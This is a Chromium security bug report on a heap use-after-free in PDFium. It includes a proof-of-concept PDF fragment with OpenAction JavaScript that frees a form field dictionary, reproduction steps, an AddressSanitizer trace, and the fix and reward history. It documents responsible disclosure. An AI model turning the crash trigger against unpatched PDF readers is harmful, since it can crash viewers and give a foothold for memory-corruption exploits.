New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Nov 5
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac , Fuchsia
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 900552: Heap-use-after-free in CPDF_OCContext::CheckOCGVisible

Reported by chamal.d...@gmail.com, Oct 31

Issue description

VULNERABILITY DETAILS

cpdf_contentmarkitem.h class has below mentioned member.
   UnownedPtr<CPDF_Dictionary> m_pPropertiesDict;
It is possible to create a pdf, where above m_pPropertiesDict points to value dictionary of a form field.
So when form field's value is changed this m_pPropertiesDict object gets deleted. Further use of m_pPropertiesDict causes a use after free.

PDF File
--------
This section of PDF file causes this bug.

{{object 4 0}} <<
  >>
stream
  (OC)
  /V
  BDC  //This content item has property /V
  BT
   /F1 20 Tf
   100 100 Td
   (Test) Tj
  ET
endstream
endobj
{{object 5 0}} <<
   /Properties 6 0 R   // Properties property points to form fields dictionary.
                       // So pdf content item's property /V will be retrieved from form fields dictionary.
   /Font <<F1 7 0 R>>
  >>
endobj
{{object 6 0}} <<
  /FT /Tx
  /Type /Annot
  /Subtype /Widget
  /T (txt1)
  /F 4
  /Rect [200 200 400 400]
  /V <</A (b)>>
>>

JavaScript in OpenAction section of PDF file
---------------------------------------------
function run()
{
  this.getField('txt1').value='a';
}
app.setTimeOut('run()',3000);


VERSION
Chrome Version: [70.0.3538.67] + [stable]
Operating System: [Ubuntu 16.04, Windows 10]

REPRODUCTION CASE
1. Save test.pdf file and test.html to same location.
2. Open test.html with chrome.
3. Wait 20 seconds. (20 seconds timeout is added to provide enough time for pdf file to load and perform its' Open Action.).
  PDF plugin process will crash.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [PDF Plugin process]
Crash State: [Address Sanitizer output]

==1==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000899e8 at pc 0x5618d087a0b3 bp 0x7fff4d2ea070 sp 0x7fff4d2ea068
READ of size 8 at 0x6060000899e8 thread T0 (chrome)
    #0 0x5618d087a0b2 in std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::__root() const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:1092:59
    #1 0x5618d087a0b2 in std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long> std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::find<fxcrt::ByteString>(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2574:0
    #2 0x5618d086e145 in std::__1::map<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >, std::__1::less<fxcrt::ByteString>, std::__1::allocator<std::__1::pair<fxcrt::ByteString const, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::find(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:1313:68
    #3 0x5618d086e145 in CPDF_Dictionary::GetObjectFor(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:87:0
    #4 0x5618d086ea1e in CPDF_Dictionary::GetStringFor(fxcrt::ByteString const&, fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:121:26
    #5 0x5618d04c126e in CPDF_OCContext::CheckOCGVisible(CPDF_Dictionary const*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_occontext.cpp:283:33
    #6 0x5618d04c1054 in CPDF_OCContext::CheckObjectVisible(CPDF_PageObject const*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_occontext.cpp:189:10
    #7 0x5618d0f68a40 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject*, CFX_Matrix const&, PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/render/cpdf_renderstatus.cpp:1099:34
    #8 0x5618d0f59fb1 in CPDF_ProgressiveRenderer::Continue(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/render/cpdf_progressiverenderer.cpp:95:30
    #9 0x5618d0f57e63 in CPDF_ProgressiveRenderer::Start(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/render/cpdf_progressiverenderer.cpp:44:3
    #10 0x5618e3076a76 in (anonymous namespace)::RenderPageImpl(CPDF_PageRenderContext*, CPDF_Page*, CFX_Matrix const&, FX_RECT const&, int, bool, IPDFSDK_PauseAdapter*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:132:26
    #11 0x5618e30730fa in RenderPageWithContext(CPDF_PageRenderContext*, fpdf_page_t__*, int, int, int, int, int, int, bool, IPDFSDK_PauseAdapter*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:917:3
    #12 0x5618e305d642 in FPDF_RenderPageBitmap_Start /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_progressive.cpp:60:3
    #13 0x5618e2ee09f2 in chrome_pdf::PDFiumEngine::ContinuePaint(int, pp::ImageData*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2999:10
    #14 0x5618e2ede488 in chrome_pdf::PDFiumEngine::Paint(pp::Rect const&, pp::ImageData*, std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> >*, std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> >*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:837:11
    #15 0x5618e2e712e8 in chrome_pdf::OutOfProcessInstance::OnPaint(std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> > const&, std::__1::vector<PaintManager::ReadyRect, std::__1::allocator<PaintManager::ReadyRect> >*, std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> >*) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:1221:16
    #16 0x5618e2ea7fca in PaintManager::DoPaint() /home/chamal/chromium/src/out/asan/../../pdf/paint_manager.cc:235:12
    #17 0x5618e2ea6b97 in PaintManager::OnManualCallbackComplete(int) /home/chamal/chromium/src/out/asan/../../pdf/paint_manager.cc:345:5
    #18 0x5618e2eaf5c4 in pp::CompletionCallbackFactory<PaintManager, pp::ThreadSafeThreadTraits>::Dispatcher0<void (PaintManager::*)(int)>::operator()(PaintManager*, int) /home/chamal/chromium/src/out/asan/../../ppapi/utility/completion_callback_factory.h:607:9
    #19 0x5618e2eaf337 in pp::CompletionCallbackFactory<PaintManager, pp::ThreadSafeThreadTraits>::CallbackData<pp::CompletionCallbackFactory<PaintManager, pp::ThreadSafeThreadTraits>::Dispatcher0<void (PaintManager::*)(int)> >::Thunk(void*, int) /home/chamal/chromium/src/out/asan/../../ppapi/utility/completion_callback_factory.h:584:7
    ....

0x6060000899e8 is located 40 bytes inside of 56-byte region [0x6060000899c0,0x6060000899f8)
freed by thread T0 (chrome) here:
    #0 0x5618c936b2e2 in operator delete(void*) _asan_rtl_:3
    #1 0x5618d086abf1 in CPDF_Dictionary::~CPDF_Dictionary() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:32:37
    #2 0x5618d0870cd4 in std::__1::default_delete<CPDF_Object>::operator()(CPDF_Object*) const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:2325:5
    #3 0x5618d0870cd4 in std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >::reset(CPDF_Object*) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:2638:0
    #4 0x5618d0870cd4 in std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >::operator=(std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >&&) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:2504:0
    #5 0x5618d0870cd4 in CPDF_Dictionary::SetFor(fxcrt::ByteString const&, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:216:0
    #6 0x5618d046888f in std::__1::enable_if<CanInternStrings<CPDF_String>::value, CPDF_String*>::type CPDF_Dictionary::SetNewFor<CPDF_String, fxcrt::ByteString&, bool>(fxcrt::ByteString const&, fxcrt::ByteString&, bool&&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.h:93:28
    #7 0x5618d04630ae in CPDF_FormField::SetValue(fxcrt::WideString const&, bool, NotificationOption) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_formfield.cpp:384:18
    #8 0x5618d0463fa6 in CPDF_FormField::SetValue(fxcrt::WideString const&, NotificationOption) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_formfield.cpp:427:10
    #9 0x5618d12d5092 in (anonymous namespace)::SetValue(CPDFSDK_FormFillEnvironment*, fxcrt::WideString const&, int, std::__1::vector<fxcrt::WideString, std::__1::allocator<fxcrt::WideString> > const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_field.cpp:425:23
    #10 0x5618d12d3710 in CJS_Field::set_value(CJS_Runtime*, v8::Local<v8::Value>) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_field.cpp:2146:5
    #11 0x5618d132f3e3 in void JSPropSetter<CJS_Field, &(CJS_Field::set_value(CJS_Runtime*, v8::Local<v8::Value>))>(char const*, char const*, v8::Local<v8::String>, v8::Local<v8::Value>, v8::PropertyCallbackInfo<void> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/js_define.h:114:23
    #12 0x5618d12f4c80 in CJS_Field::set_value_static(v8::Local<v8::String>, v8::Local<v8::Value>, v8::PropertyCallbackInfo<void> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_field.h:93:3
   ....

previously allocated by thread T0 (chrome) here:
    #0 0x5618c936a6a2 in operator new(unsigned long) _asan_rtl_:3
    #1 0x5618d048eedf in pdfium::internal::MakeUniqueResult<CPDF_Dictionary>::Scalar pdfium::MakeUnique<CPDF_Dictionary, fxcrt::WeakPtr<fxcrt::StringPoolTemplate<fxcrt::ByteString>, std::__1::default_delete<fxcrt::StringPoolTemplate<fxcrt::ByteString> > >&>(fxcrt::WeakPtr<fxcrt::StringPoolTemplate<fxcrt::ByteString>, std::__1::default_delete<fxcrt::StringPoolTemplate<fxcrt::ByteString> > >&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/third_party/base/ptr_util.h:56:29
    #2 0x5618d097c2da in CPDF_SyntaxParser::GetObjectBodyInternal(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:481:9
    #3 0x5618d097c686 in CPDF_SyntaxParser::GetObjectBodyInternal(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:503:11
    #4 0x5618d098131f in CPDF_SyntaxParser::GetIndirectObject(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:556:7
    #5 0x5618d0927f99 in CPDF_Parser::ParseIndirectObjectAt(long, unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:921:28
    #6 0x5618d092a434 in CPDF_Parser::ParseIndirectObject(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:870:12
    #7 0x5618d088032e in CPDF_Document::ParseIndirectObject(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_document.cpp:195:33
    #8 0x5618d08c4a16 in CPDF_IndirectObjectHolder::GetOrParseIndirectObject(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_indirect_object_holder.cpp:50:42
    #9 0x5618d094e1e1 in CPDF_Reference::GetDirect() const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_reference.cpp:98:35
    #10 0x5618d086e7fd in CPDF_Dictionary::GetDirectObjectFor(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:99:17
    #11 0x5618d086ed9c in CPDF_Dictionary::GetDictFor(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:148:26
    #12 0x5618d086ef3c in CPDF_Dictionary::GetDictFor(fxcrt::ByteString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:160:50
    #13 0x5618d0e9e41b in CPDF_StreamContentParser::FindResourceObj(fxcrt::ByteString const&, fxcrt::ByteString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:1146:42
    #14 0x5618d0e8884b in CPDF_StreamContentParser::Handle_BeginMarkedContent_Dictionary() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:603:17
    #15 0x5618d0e9af7b in CPDF_StreamContentParser::OnOperator(fxcrt::StringViewTemplate<char> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:572:5
    #16 0x5618d0eac196 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int, unsigned int, std::__1::vector<unsigned int, std::__1::allocator<unsigned int> > const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:1533:9
    #17 0x5618d0dae6e7 in CPDF_ContentParser::Parse() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_contentparser.cpp:211:33
    #18 0x5618d0daa776 in CPDF_ContentParser::Continue(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_contentparser.cpp:133:22
    #19 0x5618d0e320ce in CPDF_PageObjectHolder::ContinueParse(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_pageobjectholder.cpp:60:18
    #20 0x5618d0e2d945 in CPDF_Page::ParseContent() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_page.cpp:110:3
    #21 0x5618e30720ff in FPDF_LoadPage /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:351:10
    #22 0x5618e2fcf475 in chrome_pdf::PDFiumPage::GetPage() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_page.cc:129:17
    #23 0x5618e2fd9aca in chrome_pdf::PDFiumPage::GetPageFeatures() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_page.cc:574:20
    #24 0x5618e2ed99f1 in chrome_pdf::PDFiumEngine::CalculateVisiblePages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2871:55
    #25 0x5618e2ed6c22 in chrome_pdf::PDFiumEngine::PluginSizeUpdated(pp::Size const&) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:753:3
    #26 0x5618e2e674d6 in chrome_pdf::OutOfProcessInstance::OnGeometryChanged(double, float) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:1901:12
    #27 0x5618e2e77c33 in chrome_pdf::OutOfProcessInstance::DocumentSizeUpdated(pp::Size const&) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:1346:3
    #28 0x5618e2eebda2 in chrome_pdf::PDFiumEngine::LoadPageInfo(bool) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2791:14
    #29 0x5618e2f2d902 in chrome_pdf::PDFiumEngine::LoadPages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2819:5


CREDIT INFORMATION
Reporter credit: [Anonymous]
 
test.pdf
1.2 KB Download
test.html
165 bytes View Download

Comment 1 by palmer@chromium.org, Oct 31

Cc: thestig@chromium.org
Components: Internals>Plugins>PDF
Labels: Security_Severity-High Security_Impact-Stable M-71 OS-Android OS-Chrome OS-Fuchsia OS-Linux OS-Mac OS-Windows
Owner: tsepez@chromium.org
Status: Assigned (was: Unconfirmed)
tsepez, can you please pick this one up?

Comment 2 by tsepez@chromium.org, Oct 31

Repro'd.

Comment 3 by sheriffbot@chromium.org, Nov 1

Project Member
Labels: Pri-1

Comment 4 by bugdroid1@chromium.org, Nov 1

Project Member
The following revision refers to this bug:
  https://pdfium.googlesource.com/pdfium/+/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836

commit 9cdf613ce26b3bcdc566ae2f50ddb91ed9061836
Author: Tom Sepez <tsepez@chromium.org>
Date: Thu Nov 01 16:57:27 2018

Make CPDF_ContentMarkItem stop caching the properties dict.

It could be aliased with some other dictionary in the file. We
note that the dictionary one level up will always be an indirect
object in the sharing case, and indirect objects are persisted
by the IndirectObjectHolder, so hold a pointer to that and retrieve
the specific property_name field on the fly.

Bug:  chromium:900552 
Change-Id: I2e300020d6a7191648dd139a485b6d284e259976
Reviewed-on: https://pdfium-review.googlesource.com/c/44970
Commit-Queue: Tom Sepez <tsepez@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>

[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarkitem.h
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarks.cpp
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_streamcontentparser.cpp
[add] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/testing/resources/bug_900552.pdf
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarks.h
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_streamcontentparser.h
[add] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/testing/resources/bug_900552.in
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarkitem.cpp
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/fpdfsdk/fpdf_formfill_embeddertest.cpp

Comment 5 by bugdroid1@chromium.org, Nov 1

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/02cff454e822c3abb7b04566f7ab9e08d264b3fa

commit 02cff454e822c3abb7b04566f7ab9e08d264b3fa
Author: chromium-autoroll <chromium-autoroll@skia-public.iam.gserviceaccount.com>
Date: Thu Nov 01 18:38:19 2018

Roll src/third_party/pdfium ab688385cfbd..a69842065243 (5 commits)

https://pdfium.googlesource.com/pdfium.git/+log/ab688385cfbd..a69842065243


git log ab688385cfbd..a69842065243 --date=short --no-merges --format='%ad %ae %s'
2018-11-01 thestig@chromium.org Update third_party/yasm/BUILD.gn.
2018-11-01 thestig@chromium.org Roll third_party/skia/ edc6ea7a9..b98fb5b08 (131 commits; 1 trivial rolls)
2018-11-01 thestig@chromium.org Roll third_party/skia/ ffbcc3fad..edc6ea7a9 (1 commit)
2018-11-01 tsepez@chromium.org Make CPDF_ContentMarkItem stop caching the properties dict.
2018-11-01 tsepez@chromium.org Remove notion of file writing from CFX_GlobalData


Created with:
  gclient setdep -r src/third_party/pdfium@a69842065243

The AutoRoll server is located here: https://autoroll.skia.org/r/pdfium-autoroll

Documentation for the AutoRoller is here:
https://skia.googlesource.com/buildbot/+/master/autoroll/README.md

If the roll is causing failures, please contact the current sheriff, who should
be CC'd on the roll, and stop the roller if necessary.



BUG= chromium:900552 
TBR=dsinclair@chromium.org

Change-Id: Iaa3e70c669163835e43a0ca57563cd4406d90b3d
Reviewed-on: https://chromium-review.googlesource.com/c/1313032
Reviewed-by: chromium-autoroll <chromium-autoroll@skia-public.iam.gserviceaccount.com>
Commit-Queue: chromium-autoroll <chromium-autoroll@skia-public.iam.gserviceaccount.com>
Cr-Commit-Position: refs/heads/master@{#604650}
[modify] https://crrev.com/02cff454e822c3abb7b04566f7ab9e08d264b3fa/DEPS

Comment 6 by tsepez@chromium.org, Nov 5

Status: Fixed (was: Assigned)

Comment 7 by sheriffbot@chromium.org, Nov 6

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 8 by sheriffbot@chromium.org, Nov 8

Project Member
Labels: Merge-Request-71

Comment 9 by sheriffbot@chromium.org, Nov 8

Project Member
Labels: -Merge-Request-71 Hotlist-Merge-Review Merge-Review-71
This bug requires manual review: DEPS changes referenced in bugdroid comments.
Please contact the milestone owner if you have questions.
Owners: benmason@(Android), kariahda@(iOS), kbleicher@(ChromeOS), govind@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 10 by gov...@chromium.org, Nov 8

Cc: awhalley@google.com
+awhalley@ (Security TPM) for M71 merge review.

Comment 11 by awhalley@google.com, Nov 8

@govind - good for 71

Comment 12 by gov...@chromium.org, Nov 8

Labels: -Merge-Review-71 Merge-Approved-71
Approving merge to M71 branch 3578 based on comment #11. Please merge ASAP. Thank you.

Comment 13 by tsepez@chromium.org, Nov 8

Merge conflict; If we are taking the fix to https://bugs.chromium.org/p/chromium/issues/detail?id=901654 that will cover this case as well even without this patch.

Comment 14 by awhalley@google.com, Nov 8

Labels: -Merge-Approved-71 Merge-Rejected-71
Thanks tsepez@ - I'll move the merge request over to that bug.

Comment 15 by awhalley@chromium.org, Nov 12

Labels: reward-topanel

Comment 16 by awhalley@google.com, Nov 28

Labels: -M-71 M-72

Comment 17 by awhalley@chromium.org, Dec 3

Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 18 by awhalley@google.com, Dec 3

Thanks chamal.desilva@! The VRP panel decided to award $3,000 for this report. Thanks as ever!

Comment 19 by awhalley@google.com, Dec 3

Labels: -reward-unpaid reward-inprocess

Comment 20 by awhalley@google.com, Jan 28

Labels: Release-0-M72

Comment 21 by awhalley@chromium.org, Jan 28

Labels: CVE-2019-5762 CVE_description-missing

Comment 22 by sheriffbot@chromium.org, Feb 12 (6 days ago)

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 23 by awhalley@chromium.org, Today (5 hours ago)

Labels: -CVE_description-missing CVE_description-submitted

Sign in to add a comment